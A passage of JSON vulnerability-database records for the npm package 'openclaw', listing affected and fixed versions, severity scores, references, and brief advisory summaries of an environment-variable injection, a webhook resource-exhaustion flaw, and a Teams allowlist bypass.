{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-w8sb-7ymy-wkez"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpnh-32hh-p7fb"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vu
lnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ycse-95bv-7ua9"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-z8sm-pm9t-wyhu"},{"vulnerability":"VCID-z9a2-t66z-buga"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.2"}],"aliases":["CVE-2026-31990","GHSA-cfvj-7rx7-fc7c"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-e31s-2etq-6fdq"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90221?format=json","vulnerability_id":"VCID-e4ac-qm17-qbf5","summary":"## Impact\n\nOpenClaw Host-Exec Environment Variable Injection.\n\nHost exec could inherit environment variables that influence interpreters, shells, or build tools.\n\nOpenClaw is a user-controlled local assistant. 
This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.3.28`\n- Patched versions: `2026.4.8`\n\n## Fix\n\nThe issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`.\n\n## Verification\n\nThe fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary.\n\n## Credits\n\nThanks @wsparks-vc for reporting.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/advisories/GHSA-w9j9-w4cp-6wgr","reference_id":"GHSA-w9j9-w4cp-6wgr","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-w9j9-w4cp-6wgr"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-w9j9-w4cp-6wgr","reference_id":"GHSA-w9j9-w4cp-6wgr","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-w9j9-w4cp-6wgr"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109872?format=json","purl":"pkg:npm/openclaw@2026.4.8","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-29a1-
7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2g7x-vu14-nkde"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dqb2-dej7-augt"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-h9a4-1twb-d7d1"},{"vulnerability":"VCID-hy24-6xpe-pkb7"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-wyat-1259-2kg9"},{"vulnerability":"VCID-x2ru-
ydpv-f3ah"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.8"}],"aliases":["GHSA-w9j9-w4cp-6wgr"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-e4ac-qm17-qbf5"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90046?format=json","vulnerability_id":"VCID-eaaf-8rfa-f3hz","summary":"Duplicate Advisory: OpenClaw is vulnerable to unauthenticated resource exhaustion through its voice call webhook handling\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-rm59-992w-x2mv. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw before 2026.3.22 contains an unauthenticated resource exhaustion vulnerability in voice call webhook handling that buffers request bodies before provider signature checks. 
Attackers can send large or malicious webhook requests to exhaust server resources without authentication, because request bodies are buffered before the provider signature is checked.","references":[{"reference_url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87"},{"reference_url":"https://github.com/openclaw/openclaw/commit/651dc7450b68a5396a009db78ef9382633707ead","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/651dc7450b68a5396a009db78ef9382633707ead"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-rm59-992w-x2mv","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"valu
e":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-rm59-992w-x2mv"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35626","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35626"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-unauthenticated-resource-exhaustion-via-voice-call-webhook","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-unauthenticated-resource-exhaustion-via-voice-call-webhook"},{"reference_url":"https://github.com/advisories/GHSA-36cp-mh65-x882","reference_id":"GHSA-36cp-mh65-x882","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-36cp-mh65-x882"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109983?format=json","purl":"pkg:npm/openclaw@2026.3.22","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"
},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"
},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"
},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-r5bw-c2py-9udf"
},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"
},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22"}],"aliases":["GHSA-36cp-mh65-x882"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-eaaf-8rfa-f3hz"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50901?format=json","vulnerability_id":"VCID-ebwd-3xp4-7fdp","summary":"OpenClaw's MS Teams sender allowlist bypass when route allowlist is configured and sender allowlist is empty\nOpenClaw's Microsoft Teams plugin widened group sender authorization when a team/channel route allowlist was configured but `groupAllowFrom` was empty. 
Before the fix, a matching route allowlist entry could cause the message handler to synthesize wildcard sender authorization for that route, allowing any sender in the matched team/channel to bypass the intended `groupPolicy: \"allowlist\"` sender check.\n\nThis does not affect default unauthenticated access, but it does weaken a documented Teams group authorization boundary and can allow unauthorized group senders to trigger replies in allowlisted Teams routes.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-34506","reference_id":"","reference_type":"","scores":[{"value":"0.00011","scoring_system":"epss","scoring_elements":"0.01537","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00011","scoring_system":"epss","scoring_elements":"0.01544","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00013","scoring_system":"epss","scoring_elements":"0.02193","published_at":"2026-06-07T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-34506"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/88aee9161e0e6d32e810a25711e32a808a1777b2","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_
